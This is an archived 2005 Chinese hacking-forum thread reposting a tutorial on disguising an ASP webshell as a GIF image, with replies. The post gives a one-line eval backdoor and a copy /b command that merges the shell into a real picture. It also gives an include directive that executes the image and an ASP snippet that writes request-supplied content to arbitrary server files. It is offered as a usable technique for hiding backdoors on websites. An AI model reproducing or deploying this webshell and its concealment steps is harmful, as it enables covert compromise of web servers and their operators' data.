邪恶八进制信息安全团队技术讨论组 » 网络攻防技术{ Hacking and Defence } » 脚本安全[ Web Application ] » [转载]图片ASP木马 [查看完整版本]

金州 2005-12-16 05:00

[转载]图片ASP木马

信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）
文章作者：佚名


一个网站里面除了asp文件，再就数图片文件最多了，它让我们的网页"美丽动人"嘻嘻，但是你有没有想到过这里面暗藏的杀机，图片也可以是asp木马。

asp木马已经出现很长时间了，种类也越来越多，但是说到隐蔽性，我们红魂老大写的--冰狐浪子asp后门还是我众马中的首选，现在我们就把它作成图片asp木马。

首先我们把冰狐浪子asp木马服务端直接该后缀名为gif，记得用容错格式：


try{eval(Request.form('#')+'')}catch(e){}


一、include给我们指路

接下来要使用include指令，这个指令也是我们常常看到的，但是它有一个很特别的功能，可能你就没有用到过了。这就是可以调用位于其它文件中的函数，不管它的后缀名是什么，哪怕是个图片文件。

然后我们新建一个asp文件，在里面写入<--#include file="asp.gif"-->，当然你也可以把它插入到任何asp文件的头部或者尾部，仅仅就这一句话。asp.gif就是冰狐浪子asp木马服务端，也是一句话，这个图片asp木马就做好了。

不过这里还有一个小问题，虽然网站里图片很多，但如果管理员不小心打开这个图片，在IE上显示的是一把小红*，他会怎么想呢?

为了不让人怀疑，要让我们的图片美人动起来，让它成为真正的gif文件！

二、copy给我们加油

把asp.gif改名为asp.asp，然后去找个图片来，至于什么内容的图片，就看你自己的爱好啦，不过最好不要超过20kb，大了执行的速度就慢，把它保存为1.gif。

再启动windows下的dos窗口，键入copy 1.gif /b + asp.asp /a asp.gif

其中参数/b 是指定以二进制格式复制、合并文件。参数/a 是指定以ascll格式复制、合并文件。这里要注意文件的顺序。执行完后就会生成asp.gif，这就是我们的冰狐浪子asp木马服务端。不过现在它已经伪装成一个婷婷玉立的美人了，嘿嘿！如果要插入其他asp文件中，请插入下面代码

<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>


<--#include file="UploadFile/asp.gif"-->
<% end if %>

setthyfree 2005-12-27 23:04

but how exe file can be run which show to be gif format in IE?

haicao 2005-12-28 18:26

把exe先编码后用script包含进来...

aspirer 2005-12-29 18:09

楼主,下面这句我看不明白,能否解释一下?

首先我们把冰狐浪子asp木马服务端直接该后缀名为gif，记得用容错格式：
try{eval(Request.form(&#39;#&#39;)+&#39;&#39;)}catch(e){}

loulancn 2005-12-30 17:14

如果服务器的FSO关了或是改名了呢。

金州 2006-1-2 07:56

<P><FONT size=1>[quote][b]下面是引用aspirer于2005-12-29 18:09发表的:[/b]<BR>楼主,下面这句我看不明白,能否解释一下?<BR><BR>首先我们把冰狐浪子asp木马服务端直接该后缀名为gif，记得用容错格式： <BR>try{eval(Request.form('#')+'')}catch(e){}[/quote]<BR>就是<BR><SCRIPTRUNAT=SERVERLANGUAGE=JAVA script>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT><BR>asp木马中常见的东西。哈哈,看清楚这是一个asp木马得文章，不是一般意义上说的木马</FONT></P>
<P><FONT size=1>[quote][b]下面是引用setthyfree于2005-12-27 23:04发表的:[/b]<BR>but how exe file can be run which show to be gif format in IE?[/quote]<BR>哈哈，感觉不可能的，因为他自己有asp系统，才会中asp木马，那么他自己的asp难道不用到脚本，一定是用到的，他怎么可能会关闭或者修改fso.哈哈<BR>总不会我又说错了吧，哈哈</FONT></P>
<P><FONT size=1>[quote][b]下面是引用setthyfree于2005-12-27 23:04发表的:[/b]<BR>but how exe file can be run which show to be gif format in IE?[/quote]<BR>这个问题haicao大哥已经说得很好了，哈哈，至少我学会了一种思路，你也应该是吧，哈哈<BR>所以咱们一起感谢一下haicao大哥，我先感谢了，感谢，学习了，<BR>祝福大哥，<BR>另外，偷偷和setthyfree说一句，其实我也不是很会这个问题，所以等haicao大哥有时间了，不妨我们一起向他请教一下，哈哈<BR>祝福大家！</FONT></P>

冷静 2006-1-5 09:39

<--#include file="UploadFile/asp.gif"-->
要是能编辑他文件那不是有马了吗?.要是不能编辑他文件.而直接上传一个GIF文件.然后变服务端.那才NB.
那样意义不大.

查看完整版本: [转载]图片ASP木马

© 1999-2008 EvilOctal Security Team